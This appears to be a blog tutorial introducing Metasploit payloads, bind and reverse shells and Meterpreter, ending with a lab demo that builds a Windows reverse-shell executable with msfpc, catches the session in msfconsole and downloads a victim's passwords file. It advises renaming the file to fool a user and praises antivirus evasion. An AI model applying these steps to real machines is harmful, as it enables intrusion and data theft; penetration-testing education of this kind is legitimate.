In layman terms, an exploit is a security attack on a vulnerability. They have the potential for a large scale of damage such as install system malware or gain system access or recruit client machines into an existing botnet. MSFvenom Payload helps to accomplish this. The payload is a sequence of code that is executed when the vulnerability is triggered. To make things clear, an Exploit is really broken up into two parts, like so:
EXPLOIT = Vulnerability + Payload
More on Payload:
We write payload is usually in Assembly Language.
Platform and OS-dependent. That is a Win32 payload will not work in Linux (even if we are exploiting the same bug)
Different payload types exist and they accomplish different tasks such as:
- exec: Execute a command or program on the remote system
- download_exec: Download a file from a URL and execute
- upload_exec: Upload a local file and execute
- adduser: Add user to system accounts
Payloads come in many different flavours and can range from a few lines of code to small applications such as the Meterpreter shell. One should not just automatically jump to the Meterpreter shell. Metasploit contains over 200 different payloads.
However, the most common payload type used with exploits are shellcodes or aka shell payloads. These payloads are very useful because they provide the attacker with an interactive shell that can be used to completely control the system remotely.
There are two different types of shell payloads:
Bind Shells: A socket is created, a port is bound to it and when a connection is established to it, it will spawn a shell. The shell lays dormant while awaiting instructions from an attacker.
Reverse Shells: Instead of creating a listening socket, a connection is created to a predefined IP and Port and a shell is then shovelled to the Attacker.
Meterpreter shell
The Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. It can be added as a payload that is either a bind shell or reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload. Rather one should view it as an exploit platform that is executed on the remote system. It has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.
Additionally, the Meterpreter allows developers to write their own extensions, in the form of DLL files, which one can upload and execute on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.
However, the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system, once exploitation occurs. All commands run through Meterpreter and also execute within the context of the running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensic examinations.
Step-by-step demonstration:
In this blog demo, we are going to try and generate a payload in order to get control of a client Windows machine. I will try to keep this as concise as possible. Let’s get started!
On your Kali virtual machine, go to Exploitation Tools—> MSFvenom Payload Creator
To create a payload, we simply need to state the target type and where to listen. In this case, the target is a Windows machine and We will be listening to the Ethernet interface.
Type the following command in terminal: /usr/bin/msfpc windows eth0
Hit enter and you will generate a custom payload that has attacker IP and port number details. The name of the payload need not remain the auto-generated name. You can change to any convenient name that will fool the user to run the .exe file that has been created.
Further steps:
Next, we need to start the listener by running the MSF handler file which is the command: msfconsole -q -r ‘/root/filename.rc’
The listener will start up and wait for the Windows machine to execute the .exe file.
For demo purposes, I have already loaded the .exe file on a Windows machine and will now execute it by double click.
Note: The victim and host machines should be on the same LAN network.
As soon as the .exe file is run, a session is initiated at the attacker machine. We need to enter the session ID by typing the command: sessions -i 1
With this, the two computers can talk back and forth and the Windows machine can be controlled through this terminal.
In the image below: pwd command displays the current directory for my Windows machine dir command displays all the directories with their permissions.
Thus an attacker can search for sensitive information on a victim PC remotely.
For instance, in the above image, one of the directories is named Passwords and may contain passwords saved in a simple text file. The files can be downloaded on your Kali machine by one simple command: download ‘file1.txt’
Similarly, an attacker can edit or upload files to the client machine. This concludes a basic Metasploit demo where we generated a payload and exploited a victim Windows machine. Therefore, Metasploit provides efficient and easy-to-use tools for exploitation. It is an industry favourite as developers can write their own extensions and avoid detection by anti-virus systems. To know more about Metaspoilt, go to.